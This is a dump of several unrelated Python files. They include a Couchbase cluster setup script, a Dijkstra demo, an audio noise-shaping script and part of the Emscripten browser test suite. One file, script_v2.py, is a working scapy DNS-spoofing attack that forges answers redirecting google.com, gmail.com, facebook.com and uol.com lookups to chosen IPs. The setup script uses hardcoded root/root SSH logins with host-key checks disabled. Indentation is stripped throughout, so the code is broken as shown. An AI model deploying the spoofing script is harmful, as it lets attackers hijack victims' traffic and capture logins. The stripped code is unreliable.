client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print('the ip is', ip)
client.connect(ip, username="root", password="root")
scp = SCPClient(client.get_transport())
if isMaster == True:
global masterClient
masterClient = client
global masterIp
masterIp = ip
scp = SCPClient(client.get_transport())
scp.put('cluster-install.py', 'cluster-install.py')
command = "python cluster-install.py {0}".format(url)
(stdin, stdout, stderr) = client.exec_command(command)
for line in stdout.readlines():
print(line)
if isMaster != True:
client.close()
def start_environment(cbnodes, prefix):
cb_args = "couchbase_base={0}".format(cbnodes)
args = ["docker-compose", "-p='{0}'".format(prefix), "scale", cb_args] #, "spark_master=1", spark_worker_args]
print('start environment args are', args)
run_command(args)
def cleanup_environment():
args = ["python", "stop_cluster.py", "--prefix={0}".format(container_prefix)]
run_command(args)
parser = argparse.ArgumentParser(description='Setup couchbase and spark clusters. Currently supports one spark master')
parser.add_argument('--cb-nodes', dest='cbnodes', required=True, help='Number of couchbase nodes in cb cluster')
parser.add_argument('--desc-file', dest='descfile', required=True, help='File to put the IPs in')
parser.add_argument('--url', dest='url', required=True, help='Couchbase-server version')
parser.add_argument('--desc', dest='desc', required=True, help='Identify the user')
args = parser.parse_args()
#cleanup_environment()
prefix = 'cbserver' + args.desc
print('the prefix is', prefix)
start_environment(args.cbnodes, prefix)
get_ips_and_configure(args.cbnodes, prefix, args.url, args.descfile)
|
dijkstra.py
|
# Copyright 2016 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import random
import sys
import threading
log = logging.getLogger('dijkstra')
class Graph(object):
"""Representation of a sparse graph."""
def __init__(self, width, height):
self.width = width
self.height = height
self.initial = None
self.goal = None
self.filled = set()
@classmethod
def generate(cls, width, height, count):
graph = cls(width, height)
for _ in xrange(count):
while True:
x, y = graph.random_unfilled()
if (x, y) not in graph:
break
graph.fill_node(x, y)
possibilities = []
for xx in (-1, 0, 1):
for yy in (-1, 0, 1):
possibilities.append((xx, yy))
added = 0
random.shuffle(possibilities)
for px, py in possibilities:
xx = x + px
yy = y + py
if not graph.valid(xx, yy):
continue
if (xx, yy) not in graph:
graph.fill_node(xx, yy)
added += 1
if added == 3:
break
x = xx
y = yy
graph.initial = graph.random_unfilled()
while True:
goal = graph.random_unfilled()
if goal != graph.initial:
graph.goal = goal
break
return graph
def random_unfilled(self):
while True:
x = random.randint(0, self.width - 1)
y = random.randint(0, self.height - 1)
if (x, y) not in self.filled:
return (x, y)
def fill_node(self, x, y):
self.filled.add((x, y))
def valid(self, x, y):
if x < 0 or y < 0:
return False
if x >= self.width or y >= self.height:
return False
return True
def dist(self, x, y):
gx, gy = self.goal
dx = gx - x
dy = gy - y
return dx*dx + dy*dy
def __str__(self):
return '%s(%d, %d, %s) initial=%s goal=%s' % (
self.__class__.__name__, self.width, self.height,
sorted(self.filled), self.initial, self.goal)
def __contains__(self, elem):
return elem in self.filled
def dijkstra(graph):
solution = None
via = {graph.initial: None}
candidates = []
x, y = graph.initial
for xx in (-1, 0, 1):
for yy in (-1, 0, 1):
px = x + xx
py = y + yy
point = (px, py)
if graph.valid(px, py) and point not in graph and point not in via:
d = graph.dist(px, py)
candidates.append((d, point))
via[point] = graph.initial
while candidates:
candidates.sort(reverse=True)
d, point = candidates.pop()
if d == 0:
solution = [point]
while True:
next_point = via[point]
solution.append(next_point)
if next_point == graph.initial:
break
else:
point = next_point
solution.reverse()
break
else:
x, y = point
for xx in (-1, 0, 1):
for yy in (-1, 0, 1):
px = x + xx
py = y + yy
new_point = (px, py)
if graph.valid(px, py)\
and new_point not in graph\
and new_point not in via:
d = graph.dist(px, py)
candidates.append((d, new_point))
via[new_point] = point
return solution
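# Illustrative sketch (not part of the original module): the same frontier
# expansion as dijkstra() above, but keeping the candidates in a heap via
# heapq instead of re-sorting the whole candidate list on every iteration.
# Left uncalled, purely to contrast the two priority-queue strategies.
def dijkstra_heapq(graph):
    import heapq
    solution = None
    via = {graph.initial: None}
    candidates = []
    x, y = graph.initial
    for xx in (-1, 0, 1):
        for yy in (-1, 0, 1):
            point = (x + xx, y + yy)
            if graph.valid(*point) and point not in graph and point not in via:
                heapq.heappush(candidates, (graph.dist(*point), point))
                via[point] = graph.initial
    while candidates:
        d, point = heapq.heappop(candidates)
        if d == 0:
            # reached the goal; walk back through `via` to rebuild the path
            solution = [point]
            while point != graph.initial:
                point = via[point]
                solution.append(point)
            solution.reverse()
            break
        x, y = point
        for xx in (-1, 0, 1):
            for yy in (-1, 0, 1):
                new_point = (x + xx, y + yy)
                if graph.valid(*new_point) and new_point not in graph and new_point not in via:
                    heapq.heappush(candidates, (graph.dist(*new_point), new_point))
                    via[new_point] = point
    return solution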
def run():
"""Run Dijkstra's algorithm."""
graph = Graph.generate(100, 100, 80)
log.info('initial = %s', graph.initial)
log.info('goal = %s', graph.goal)
solution = dijkstra(graph)
solution_len = 0 if solution is None else len(solution)
log.info('solution = %s, len = %d', solution, solution_len)
def run_times(quiet, times):
"""Run Dijkstra's algorithm in a loop."""
if not quiet:
sys.stdout.write('%d\n' % (os.getpid(),))
sys.stdout.flush()
if times <= 0:
while True:
run()
else:
for _ in xrange(times):
run()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-q', '--quiet', action='store_true',
help='Be quiet')
parser.add_argument('-v', '--verbose', action='store_true',
help='Be verbose')
parser.add_argument('-t', '--threads', type=int, default=1,
help='Number of threads')
parser.add_argument('-n', '--num', type=int, default=0,
help='Number of iterations')
args = parser.parse_args()
logging.basicConfig()
if args.verbose:
log.setLevel(logging.DEBUG)
if args.threads == 1:
run_times(args.quiet, args.num)
else:
threads = []
for _ in xrange(args.threads):
t = threading.Thread(target=run_times, args=(args.quiet, args.num))
t.start()
threads.append(t)
for i, t in enumerate(threads):
t.join()
log.info('joined thread %d', i)
if __name__ == '__main__':
main()
|
script_v2.py
|
from threading import Thread
from Queue import Queue, Empty
from scapy.all import *
m_iface = "wlan1"
m_finished = False
def print_summary(packet):
target = {'uol.com':'200.147.67.142',
'google.com':'173.194.118.35',
'facebook.com':'173.252.120.6',
'gmail.com':'216.58.222.5'
}
if packet.haslayer(DNS) and packet.getlayer(DNS).qr == 0 and len(target) > 0:
for targetDomain, ipAddressTarget in target.items():
if packet.getlayer(DNS).qd.qname == targetDomain:
try:
requestIP = packet[IP]
requestUDP = packet[UDP]
requestDNS = packet[DNS]
requestDNSQR = packet[DNSQR]
responseIP = IP(src=requestIP.dst, dst=requestIP.src)
responseUDP = UDP(sport = requestUDP.dport, dport = requestUDP.sport)
responseDNSRR = DNSRR(rrname=packet.getlayer(DNS).qd.qname, rdata = ipAddressTarget)
responseDNS = DNS(qr=1,id=requestDNS.id, qd=requestDNSQR, an=responseDNSRR)
answer = responseIP/responseUDP/responseDNS
send(answer)
except:
print "Unexpected error:"
print "Exception..."
else:
print packet.summary()
def threaded_sniff_target(q):
global m_finished
while not m_finished:
print("aqui")
sniff(iface = m_iface, count = 10, filter = 'udp port 53', prn = lambda x : q.put(x))
m_finished = True
def threaded_sniff():
q = Queue()
sniffer = Thread(target = threaded_sniff_target, args = (q,))
sniffer.daemon = True
sniffer.start()
while (not m_finished):
try:
pkt = q.get(timeout = 1)
print_summary(pkt)
except Empty:
pass
threaded_sniff()
n = raw_input()
|
multiprocess_timeout.py
|
from multiprocessing import Process
from je_auto_control.utils.exception.exceptions import AutoControlTimeoutException
from je_auto_control.utils.exception.exception_tag import timeout_need_on_main_error
def multiprocess_timeout(check_function, time: int):
try:
new_process = Process(target=check_function)
new_process.start()
new_process.join(timeout=time)
except AutoControlTimeoutException:
raise AutoControlTimeoutException(timeout_need_on_main_error)
new_process.terminate()
if new_process.exitcode is None:
return "timeout"
else:
return "success"
|
noise_shaping.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
from __future__ import print_function
import argparse
from distutils.util import strtobool
import multiprocessing as mp
import os
import sys
import numpy as np
from scipy.io import wavfile
from sprocket.speech.feature_extractor import FeatureExtractor
from sprocket.speech.synthesizer import Synthesizer
from feature_extract import low_cut_filter
from utils import find_files
from utils import read_hdf5
from utils import read_txt
FS = 22050
SHIFTMS = 5
FFTL = 1024
MCEP_DIM_START = 2
MCEP_DIM_END = 37
MCEP_ALPHA = 0.455
MAG = 0.5
def main():
parser = argparse.ArgumentParser(
description="making feature file argsurations.")
parser.add_argument(
"--waveforms", default=None,
help="directory or list of filename of input wavfile")
parser.add_argument(
"--stats", default=None,
help="filename of hdf5 format")
parser.add_argument(
"--writedir", default=None,
help="directory to save preprocessed wav file")
parser.add_argument(
"--fs", default=FS,
type=int, help="Sampling frequency")
parser.add_argument(
"--shiftms", default=SHIFTMS,
type=int, help="Frame shift in msec")
parser.add_argument(
"--fftl", default=FFTL,
type=int, help="FFT length")
parser.add_argument(
"--mcep_dim_start", default=MCEP_DIM_START,
type=int, help="Start index of mel cepstrum")
parser.add_argument(
"--mcep_dim_end", default=MCEP_DIM_END,
type=int, help="End index of mel cepstrum")
parser.add_argument(
"--mcep_alpha", default=MCEP_ALPHA,
type=float, help="Alpha of mel cepstrum")
parser.add_argument(
"--mag", default=MAG,
type=float, help="magnification of noise shaping")
parser.add_argument(
"--verbose", default=1,
type=int, help="log message level")
parser.add_argument(
'--n_jobs', default=1,
type=int, help="number of parallel jobs")
parser.add_argument(
'--inv', default=False, type=strtobool,
help="if True, inverse filtering will be performed")
args = parser.parse_args()
# read list
if os.path.isdir(args.waveforms):
file_list = sorted(find_files(args.waveforms, "*.wav"))
else:
file_list = read_txt(args.waveforms)
# define feature extractor
feature_extractor = FeatureExtractor(
analyzer="world",
fs=args.fs,
shiftms=args.shiftms,
fftl=args.fftl)
# define synthesizer
synthesizer = Synthesizer(
fs=args.fs,
shiftms=args.shiftms,
fftl=args.fftl)
# check directory existence
if not os.path.exists(args.writedir):
os.makedirs(args.writedir)
def noise_shaping(wav_list):
for wav_name in wav_list:
# load wavfile and apply low cut filter
fs, x = wavfile.read(wav_name)
wav_type = x.dtype
x = np.array(x, dtype=np.float64)
# check sampling frequency
if not fs == args.fs:
print("ERROR: sampling frequency is not matched.")
sys.exit(1)
# extract features (only to get the number of frames)
f0, _, _ = feature_extractor.analyze(x)
num_frames = f0.shape[0]
# load average mcep
mlsa_coef = read_hdf5(args.stats, "/mean")
mlsa_coef = mlsa_coef[args.mcep_dim_start:args.mcep_dim_end] * args.mag
mlsa_coef[0] = 0.0
if args.inv:
mlsa_coef[1:] = -1.0 * mlsa_coef[1:]
mlsa_coef = np.tile(mlsa_coef, [num_frames, 1])
# synthesis and write
x_ns = synthesizer.synthesis_diff(
x, mlsa_coef, alpha=args.mcep_alpha)
x_ns = low_cut_filter(x_ns, args.fs, cutoff=70)
write_name = args.writedir + "/" + os.path.basename(wav_name)
if wav_type == np.int16:
wavfile.write(write_name, args.fs, np.int16(x_ns))
else:
wavfile.write(write_name, args.fs, x_ns)
# divide list
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
processes = []
for f in file_lists:
p = mp.Process(target=noise_shaping, args=(f,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen
from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from common import read_file, requires_v8, also_with_minimal_runtime
from tools import shared
from tools import ports
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
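# Illustrative sketch (not part of the original test suite): what a single
# byte-range request against the ChunkedServerHandler above looks like from
# the client side. Uses only the standard library; port 11111 matches the
# server started in test_chunked_synchronous_xhr_server. Left uncalled.
def _example_chunked_range_request(start=0, end=9):
    import urllib.request
    req = urllib.request.Request('http://localhost:11111/',
                                 headers={'Range': 'bytes=%d-%d' % (start, end)})
    with urllib.request.urlopen(req) as resp:
        # the handler replies with data[start:end + 1] and a matching Content-Length
        return resp.read()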
def also_with_wasmfs(f):
def metafunc(self, wasmfs, *args, **kwargs):
if wasmfs:
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
metafunc._parameterize = {'': (False,),
'wasmfs': (True,)}
return metafunc
def also_with_wasm2js(f):
assert callable(f)
def metafunc(self, with_wasm2js):
assert self.get_setting('WASM') is None
if with_wasm2js:
self.set_setting('WASM', 0)
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'wasm2js': (True,)}
return metafunc
def shell_with_script(shell_file, output_file, replacement):
shell = read_file(path_from_root('src', shell_file))
create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self, *args, **kwargs)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def also_with_threads(f):
def decorated(self, *args, **kwargs):
f(self)
if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
print('(threads)')
self.emcc_args += ['-pthread']
f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
if EMTEST_BROWSER != 'node':
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL']) # is the default anyhow
def test_sdl1_es6(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL', '-sEXPORT_ES6'])
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
create_file(cpp_file, r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with --save-dir for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'),
args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map'])
@also_with_wasmfs
def test_preload_file(self):
create_file('somefile.txt', 'load me right before running the code please')
create_file('.somefile.txt', 'load me right before running the code please')
create_file('some@file.txt', 'load me right before running the code please')
absolute_src_path = os.path.abspath('somefile.txt')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
# TODO: change this when wasmfs supports relative paths.
if self.get_setting('WASMFS'):
path = "/" + path
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath])
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
create_file(tricky_filename, 'load me right before running the code please')
make_main(tricky_filename)
    # As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' so that it is not confused with the 'src@dst' notation.
self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')])
# TODO: WASMFS doesn't support the rest of this test yet. Exit early.
if self.get_setting('WASMFS'):
return
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path])
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
    ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding a directory that shouldn't end up in the packaged VFS.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
f = fopen("%s", "r");
assert(f != NULL);
fclose(f);
f = fopen("%s", "r");
assert(f == NULL);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*'])
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY)
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins'])
  # Tests that user .html shell files can manually download .data files created with the --preload-file cmdline option.
@parameterized({
'default': ([],),
'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],),
})
@requires_threads
def test_preload_file_with_manual_data_download(self, args):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args)
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
# Move .data file out of server root to ensure that getPreloadedPackage is actually used
os.mkdir('test')
shutil.move('manual_download_data.data', 'test/manual_download_data.data')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
  # Tests that output files with single or double quotes in their names are handled by
  # correctly escaping the names.
def test_output_file_escaping(self):
self.set_setting('EXIT_RUNTIME')
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.abspath(d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
create_file(os.path.join(d, txt), 'load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
create_file(cpp, r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
abs_txt = os.path.join(abs_d, txt)
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.abspath(page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0')
@parameterized({
'0': (0,),
'1mb': (1 * 1024 * 1024,),
'100mb': (100 * 1024 * 1024,),
'150mb': (150 * 1024 * 1024,),
})
def test_preload_caching(self, extra_size):
self.set_setting('EXIT_RUNTIME')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
if is_chrome() and extra_size >= 100 * 1024 * 1024:
self.skipTest('chrome bug')
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-sALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY)
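    # First load: nothing is cached yet, so checkPreloadResults() reports 0 cached packages
    # (exit:0). On reload the data package should be served from IndexedDB (exit:1).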
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_preload_caching_indexeddb_name(self):
self.set_setting('EXIT_RUNTIME')
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
